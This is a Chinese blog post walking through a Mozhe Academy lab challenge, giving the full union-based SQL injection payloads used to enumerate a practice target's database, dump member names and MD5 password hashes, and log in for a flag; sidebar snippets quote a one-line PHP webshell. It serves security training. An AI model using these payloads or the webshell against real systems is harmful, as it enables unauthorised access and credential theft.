墨者学院-XWAY科技管理系统V3.0

最新推荐文章于 2024-05-19 18:10:52 发布
最新推荐文章于 2024-05-19 18:10:52 发布
阅读量3.3k 收藏 14
点赞数 5
文章标签: 科技 数据库 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lianliandad/article/details/126864682
版权
本文详细描述了一次SQL注入漏洞的探测过程,从构造特殊查询字符串到判断字段数、回显点,最终成功利用漏洞获取数据库信息并登陆系统。过程中揭示了数据库名为mozhe_Discuz_StormGroup,版本为5.7.22-0ubuntu0.16.04.1,并获取了两张表的部分数据。
摘要由CSDN通过智能技术生成

IP地址 : 124.70.22.208 端口 : 44703 协议 : http 其他 : [点击访问]

点击登录界面下的移动条幅

第一步,判断是否存在sql注入漏洞

构造 ?id=1 and 1=1 ,回车

正常显示

构造 ?id=1 and 1=2 ,回车

异常显示,初步判断这里可能存在一个注入漏洞。

第二步:判断字段数

构造 ?id=1 and 1=1 order by 1 回车 , 在by 后 依次 输 1,2,3,4,5,

当到 ?id=1 and 1=1 order by 5 回车时显示异常,判断字段数为 4

第三步:判断回显点

构造 ?id=1 and 1=4 union select 1,2,3,4 回车

页面出现了  2 ,3 ,说明我们可以在数字  2,3  处显示我们想要的内容

第四步:查询相关内容

查询当前数据库名、版本名

构造 ?id=1 and 1=4 union select 1,database(),version(),4  回车

数据库的名:mozhe_Discuz_StormGroup

版本号:5.7.22-0ubuntu0.16.04.1

查询数据库mozhe_discuz_stormgroup中的表

语句:id=-1 union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=database()

获取到StormGroup_member,notice 这两张表。

接着去爆字段值

语句:id=-1/**/union/**/select/**/1,2,group_concat(name,id,password),4/**/from/**/StormGroup_member

获得两条记录,密码是被md5加密,账号是mozhe

mozhe1356f589a7df439f6f744ff19bb8092c0

mozhe18d30ea5ff534319652f548256aeb67b2

尝试去登录,发现第一个号被禁用了

接着去登录第二个,成功登录进去,获取到flag.

燕返故人归来
关注
  • 5
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
墨者学院 - 密码学加解密实训(Zip伪加密)
多崎巡礼的博客
09-18 1697
zip格式文件伪加密 实践是检验真理的唯一标准 简介 zip文件是一种压缩文件,可进行加密,也可不加密。而伪加密是在未加密的zip文件基础上修改了它的压缩源文件目录区里的全局方式位标记的比特值,使得压缩软件打开它的时候识别为加密文件,提示输入密码, 而在这个时候,不管你用什么软件对其进行密码破解,都无法打开它!这就是它存在的意义! zip官方文档zip中文详解 文件组成 压缩源...
墨者学院 - WebShell代码分析溯源(第1题)
多崎巡礼的博客
07-27 1262
下载源码 使用seay源代码审计系统扫一扫(实在不想一个个去看。。。) seay源代码审计系统:https://pan.baidu.com/s/1UhIqGc_wYfelqN47Tn_Qjg     下载出源代码,找到cn-right.php   <?php error_reporting(0); $_GET['POST']($_POST['GET']); ?> ...
墨者学院(POST注入)
2301_77578012的博客
05-19 435
使用burpsuite抓包放在1.txt文件中,并且1.txt放在sqlmap工具。发现存在注入点,并且给出了我们具体执行的payload格式。(如果大家对工具有需求的话可以q我哈)参数后所跟数据也可以通过抓包获取。1.墨者靶场(POST注入)2.sqlmap工具(主要)3.burpsuite工具。,在需要测试参数后加。
墨者学院-入门级-SQL注入漏洞测试(布尔盲注)-小白必看(超详细)
kitiu666的博客
08-26 4129
2020年8月25日,第五次渗透测试。 通过对sql语句进行注入,数据库的库名,表名,字段进步爆破,最终获得key。 准备需求: 1.windows系统pc 2.2.burpsuite(bp)抓包软件 3.sqlmap sql 数据库的爆破工具 1.进入靶场 ...
墨者学院】WebShell文件上传漏洞分析溯源(第2题)
m0_66835614的博客
11-28 1211
墨者学院】WebShell文件上传漏洞分析溯源(第2题)
墨者学院 - CMS系统漏洞分析溯源(第2题)
多崎巡礼的博客
08-06 1347
登陆后台。 使用admin.php就可以进入后台 用户名密码都是自动填上的,直接登陆就可以。 界面->模板风格->详细列表->search->index.html->将一句话木马添加进去后保存。      ...
墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)
最新发布
05-29
HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1题)、PHP代码分析溯源(第2题)、PHP逻辑漏洞利用实战(第1题)、SQL手工注入漏洞测试(Access数据库)
APP原型实例:墨者科技-旅行小蜜APP2.0.rp
12-17
产品经理
0080 APP原型实例:墨者科技-旅行小蜜APP2.0.rp
01-06
rp原型源文件
墨者安全软件-免费杀毒软件
11-11
墨者安全专家是一款永久免费的免疫型安全防护软件,集墨者独创的 “革离术”、终身免费杀毒、修复系统漏洞、上网痕迹清理、网络防火墙、系统实时保护、安全互助社区等强大功能于一身。特别是独创的“革离术”,利用...
全球信息管理系统 V3.0(零壹科技)
02-23
全球办公自动化系统V3.0&全部源代码本系统在一些大中型企业(跨多达24个区域)一直都在很好的服务过,主要在FTP 控制 UDP控制 HTTP控制 傁客户数据库数据库 数据压缩加密方面进行了综合深入的应用OAEnterPrise.exe: 用户及权限的集成管理 ;报表种类及字段自动定义sky.exe 报表录入及FTP自动传输系统,(多对一)初始密码为1ReportServer.exe 报表自动接收系统,自动汇总导入数据库(DBF)SkyEditor.exe 文档录入及自动FTP发送系统editorserver.exe 文档自动分类接收系统SQL.exe 通用数据库查询系统 {支持各类数据库格式的查询,支持Undo 及 Redo 操作,可以保存任意中间结果 ,支持对任意结果的n次查询 支持查询结果导入excel表 支持多表查询操作} 需要 BDEskynet.exe 电子邮件系统(采用 HTTP DLL )WebSearch.exe 文档及报表远程查询系统webchat.exe 远程会议系统 {必须先在装有FTP SERVER 的服务器上 启动InstallSoftNew目录下ChatServer.exe}WinArchiver.exe :压缩解压系统SkyImage.exe :图片编辑器
X-way2.5一款暴力破解密码的软件
11-12
好东西大家一起分享,试过,很好用!但是不要做坏事!
墨者安全专家 v3.7.2.9
03-12
墨者安全专家第二代为您彻底免疫未知病毒,并且提供终身免费国际杀毒品牌趋势科技的优质产品! 墨者安全专家第二代是融合了反rootkit技术、用户权限管理技术和白名单技术并有机集成的免疫"革离"技术。同时第二代集...
墨者学院 - CMS系统漏洞分析溯源(第3题)
多崎巡礼的博客
10-29 1381
新云网站内容管理系统是一套开源的WEB网站管理系统,采用目前非常成熟的ASP+Access/SQL开发而成。使用它,我们可以很方便的管理自己的网站,目前新云网站内容管理系统最新的版本是v4.0.0 SP2。本文要介绍的捕洞就出在新云网站内容管理系统v4.0.0 SP1以及未打官方最新补丁的v4.0.O SP2的问吧系统中。 新云的问吧是类似百度知道的互动知识问答分享平台,问吧采用自己的数据库,数...
墨者学院-WebShell文件上传分析溯源(第2题)
JimWu的博客
09-05 864
WebShell文件上传分析溯源(第2题) 难易程度:★★★★★ 题目类型:文件上传 使用工具:FireFox浏览器、御剑、burpsuite、菜刀 1.打开靶场,我们没发现能到二级目录的按钮。 2.打开御剑,开始目录扫描 发现两个上传文件的地址。/admin/upload1.php和/admin/upload2.php 3.打开upload1.php,提示无权访问,跳到了upload2.php...
墨者学院—网络安全篇1
博客
09-16 237
题目目录某防火墙默认口令浏览器信息伪造 某防火墙默认口令 背景介绍 安全工程师"墨者"对某公司进行授权测试时,扫描公网IP时发现当前公司在网络边界部署了某型号防火墙,并且公网可以访问防火墙的WEB页面。 实训目标 1、掌握查看当前设备类型的方法; 2、了解网络(安全)设备的登录控制方式; 3、了解网络(安全)设备的默认口令获取方式; 4、了解当前型号防火墙的不同账户的区别; 5、了解在网络信息安全中的权限最小化、权限分离作用; 解题方向 找到防火墙的默认口令进行登录。 解题思路 开启靶场环境 查看源代码
墨者学院——SQL注入漏洞测试(布尔盲注)
2303_76679642的博客
04-21 427
9.最后看字段值: sqlmap -r *.txt(新建的文本文件) --level 5 --risk 3 -D 数据库名 -T 表名 -C (字段1,字段2,....) --dump --dbms mysql --batch。8.接着来查找表的字段:sqlmap -r *.txt(新建的文本文件) --level 5 --risk 3 -D 数据库名 -T 表名 --columns --dbms mysql --batch。id=1 and 1=1,内容显示, 判断这个id的值类型是数字类型。
墨者学院--SQL注入实战(防注入)-Access(菜刀连接超时问题)
weixin_43071873的博客
09-20 906
进入靶场,测试一下,输入and 1=1 ,提示操作被记录 数据被直接保存在数据库,可以考虑直接把一句话木马传上去 直接传,发现一句话木马没被传上去, 将木马进行url编码一下传入。 使用御剑查找后台。 上菜刀 PS:这个靶场有点奇怪,插入一句话木马后,用菜刀可能超时连不上,重置缓存也不行,遇到这种情况,可以尝试换个浏览器,换一个新的菜刀,或者换个工具,冰歇啊,蚁剑都可以。也可以参照其他博主在插入一句话时用 and 1=<%eval request(“a”)%>,具体为什么出现这个问题
墨者学院_Apache Struts2远程代码执行漏洞(S2-015)复现
cc_de_csdn的博客
08-26 727
1.由题意得知靶场存在S2-15漏洞 2.使用struts2漏洞扫描工具对网站进行扫描发现存在漏洞 3.使用工具的远程代码执行功能,通过ls发现存在key文件,通过cat访问key文件得到key ...
墨者学院sql注入 x-f
07-27
墨者学院SQL注入是一种常见的Web应用程序安全漏洞,攻击者通过在输入字段中插入恶意的SQL代码来实现对数据库的非授权访问。X-F是HTTP请求头部的一个字段,通常用于传递客户端IP地址或其他相关信息。在某些情况下,攻击者可能会尝试利用X-F字段进行SQL注入攻击。为了防止SQL注入攻击,开发人员应该合理地验证和过滤用户输入,并使用参数化查询或预编译语句来防止SQL注入攻击。此外,最好避免将用户输入直接拼接到SQL查询中。墨者学院可能提供相关的课程或教程来帮助开发人员学习和理解如何防止SQL注入攻击。
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值